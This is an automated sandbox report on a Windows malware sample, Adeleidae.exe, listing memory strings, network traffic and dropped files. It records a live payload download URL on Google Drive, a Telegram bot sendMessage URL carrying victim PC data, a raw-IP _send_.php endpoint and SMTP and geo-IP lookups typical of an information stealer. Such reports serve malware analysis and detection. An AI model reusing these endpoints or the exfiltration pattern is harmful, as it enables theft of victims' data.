String found in binary or memory: *.google.com*.appengine.google.com*.bdn.dev*.origin-test.bdn.dev*.cloud.google.com*.crowdsource.google.com*.datacompute.google.com*.google.ca*.google.cl*.google.co.in*.google.co.jp*.google.co.uk*.google.com.ar*.google.com.au*.google.com.br*.google.com.co*.google.com.mx*.google.com.tr*.google.com.vn*.google.de*.google.es*.google.fr*.google.hu*.google.it*.google.nl*.google.pl*.google.pt*.googleapis.cn*.googlevideo.com*.gstatic.cn*.gstatic-cn.comgooglecnapps.cn*.googlecnapps.cngoogleapps-cn.com*.googleapps-cn.comgkecnapps.cn*.gkecnapps.cngoogledownloads.cn*.googledownloads.cnrecaptcha.net.cn*.recaptcha.net.cnrecaptcha-cn.net*.recaptcha-cn.netwidevine.cn*.widevine.cnampproject.org.cn*.ampproject.org.cnampproject.net.cn*.ampproject.net.cngoogle-analytics-cn.com*.google-analytics-cn.comgoogleadservices-cn.com*.googleadservices-cn.comgooglevads-cn.com*.googlevads-cn.comgoogleapis-cn.com*.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.netdoubleclick.cn*.doubleclick.cn*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletraveladservices-cn.com*.googletraveladservices-cn.comgoogletagservices-cn.com*.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google. equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: smtp.ionos.es

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 24 Oct 2024 01:41:09 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: msiexec.exe, 00000006.00000002.3023161132.00000000258F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026822944.0000000027B9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027BE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025903000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027C2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.geotrust.com/GeoTrustTLSRSACAG1.crt0
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026822944.0000000027B9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027BE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025903000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027C2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cdp.geotrust.com/GeoTrustTLSRSACAG1.crl0v
Source: powershell.exe, 00000001.00000002.2429767028.00000000075B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026822944.0000000027B9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027BE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025903000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027C2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0=
Source: Adeleidae.exe, 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Adeleidae.exe, 00000000.00000000.1748229862.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2428146158.0000000005F4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026822944.0000000027B9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027BE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025903000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027C2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0B
Source: powershell.exe, 00000001.00000002.2424947064.0000000005037000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2424947064.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msiexec.exe, 00000006.00000002.3023161132.00000000258F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://smtp.ionos.es
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026822944.0000000027B9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027BE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025903000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027C2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://status.geotrust.com0
Source: powershell.exe, 00000001.00000002.2424947064.0000000005037000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026822944.0000000027B9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027BE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025903000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027C2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000001.00000002.2429767028.00000000075B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000001.00000002.2424947064.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216041%0D%0ADate%20a
Source: msiexec.exe, 00000006.00000003.2540510272.0000000009EC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000006.00000002.3023161132.0000000025923000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 00000006.00000002.3023161132.000000002592D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: powershell.exe, 00000001.00000002.2428146158.0000000005F4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2428146158.0000000005F4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2428146158.0000000005F4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/A
Source: msiexec.exe, 00000006.00000002.3022462805.0000000024E30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh1
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh17
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh1y
Source: msiexec.exe, 00000006.00000003.2596005460.0000000009EF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000006.00000003.2596005460.0000000009EF6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3009741267.0000000009EBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/(
Source: msiexec.exe, 00000006.00000003.2596005460.0000000009EF6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3009741267.0000000009EBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/F
Source: msiexec.exe, 00000006.00000003.2596005460.0000000009EF6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2540510272.0000000009EC0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3009741267.0000000009EBA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3009741267.0000000009EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh1&export=download
Source: msiexec.exe, 00000006.00000003.2596005460.0000000009EF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/o
Source: powershell.exe, 00000001.00000002.2424947064.0000000005037000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2428146158.0000000005F4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.00000000257BD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.000000002582D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000006.00000002.3023161132.00000000257BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000006.00000002.3023161132.000000002582D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.71
Source: msiexec.exe, 00000006.00000002.3023161132.00000000257E7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.000000002582D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.71$
Source: msiexec.exe, 00000006.00000003.2540510272.0000000009EC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000006.00000002.3024547427.0000000026896000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000269EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000268BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: msiexec.exe, 00000006.00000002.3024547427.000000002684F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.0000000026ACA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000269F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: msiexec.exe, 00000006.00000002.3024547427.0000000026896000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000269EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000268BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: msiexec.exe, 00000006.00000002.3024547427.000000002684F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.0000000026ACA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000269F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026822944.0000000027B9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027BE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025903000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027C2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: msiexec.exe, 00000006.00000003.2540510272.0000000009EC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000006.00000003.2540510272.0000000009EC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000006.00000003.2540510272.0000000009EC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000006.00000003.2540510272.0000000009EC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 00000006.00000002.3023161132.0000000025954000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 00000006.00000002.3023161132.000000002595E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967

Source: unknown	HTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.4:49882 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50021 version: TLS 1.2

Source: C:\Users\user\Desktop\Adeleidae.exe

Code function: 0_2_004052F3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052F3

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Adeleidae.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Adeleidae.exe

Code function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004032A0

Source: C:\Users\user\Desktop\Adeleidae.exe	File created: C:\Windows\resources\Nebengeschfter.ini	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	File created: C:\Windows\resources\0809	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	File created: C:\Windows\Fonts\thyrididae.ini	Jump to behavior

Source: C:\Users\user\Desktop\Adeleidae.exe	Code function: 0_2_00404B30	0_2_00404B30
Source: C:\Users\user\Desktop\Adeleidae.exe	Code function: 0_2_00407041	0_2_00407041
Source: C:\Users\user\Desktop\Adeleidae.exe	Code function: 0_2_0040686A	0_2_0040686A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04CDE260	1_2_04CDE260
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02A8D278	6_2_02A8D278
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02A85362	6_2_02A85362
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02A8C147	6_2_02A8C147
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02A8C738	6_2_02A8C738
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02A8C468	6_2_02A8C468
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02A8CA08	6_2_02A8CA08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02A8E988	6_2_02A8E988
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02A8F961	6_2_02A8F961
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02A83E09	6_2_02A83E09
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02A8CFA9	6_2_02A8CFA9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02A8CCD8	6_2_02A8CCD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02A87118	6_2_02A87118
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02A829EC	6_2_02A829EC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02A839EE	6_2_02A839EE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02A8E97B	6_2_02A8E97B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02A89E55	6_2_02A89E55
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF8FB0	6_2_27EF8FB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF7B78	6_2_27EF7B78
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFD308	6_2_27EFD308
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF81D0	6_2_27EF81D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFB7A8	6_2_27EFB7A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF8FA1	6_2_27EF8FA1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFF788	6_2_27EFF788
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFD787	6_2_27EFD787
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF5780	6_2_27EF5780
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFD798	6_2_27EFD798
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFB798	6_2_27EFB798
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFF778	6_2_27EFF778
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF2749	6_2_27EF2749
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF2758	6_2_27EF2758
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF7722	6_2_27EF7722
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF7720	6_2_27EF7720
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF4ECA	6_2_27EF4ECA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF4ED0	6_2_27EF4ED0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF1EA8	6_2_27EF1EA8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF1E98	6_2_27EF1E98
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFEE68	6_2_27EFEE68
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFCE67	6_2_27EFCE67
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF6E62	6_2_27EF6E62
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFCE78	6_2_27EFCE78
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF6E70	6_2_27EF6E70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFEE57	6_2_27EFEE57
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF4620	6_2_27EF4620
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF4610	6_2_27EF4610
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF15E8	6_2_27EF15E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF15F8	6_2_27EF15F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF0D48	6_2_27EF0D48
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFE548	6_2_27EFE548
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFC548	6_2_27EFC548
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFC558	6_2_27EFC558
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFE538	6_2_27EFE538
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF0489	6_2_27EF0489
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF6488	6_2_27EF6488
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF0498	6_2_27EF0498
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF3460	6_2_27EF3460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF6478	6_2_27EF6478
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF345F	6_2_27EF345F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFBC29	6_2_27EFBC29
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFDC28	6_2_27EFDC28
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFBC38	6_2_27EFBC38
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFDC19	6_2_27EFDC19
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFFC18	6_2_27EFFC18
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF5BCA	6_2_27EF5BCA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF5BD8	6_2_27EF5BD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF2BAF	6_2_27EF2BAF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF2BB0	6_2_27EF2BB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF7B77	6_2_27EF7B77
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF5328	6_2_27EF5328
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFB307	6_2_27EFB307
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF2300	6_2_27EF2300
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF531A	6_2_27EF531A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFB318	6_2_27EFB318
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFF2E7	6_2_27EFF2E7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFF2F8	6_2_27EFF2F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFD2F7	6_2_27EFD2F7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF22F0	6_2_27EF22F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF72C8	6_2_27EF72C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF72B8	6_2_27EF72B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF4A68	6_2_27EF4A68
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF4A78	6_2_27EF4A78
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF1A41	6_2_27EF1A41
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF1A50	6_2_27EF1A50
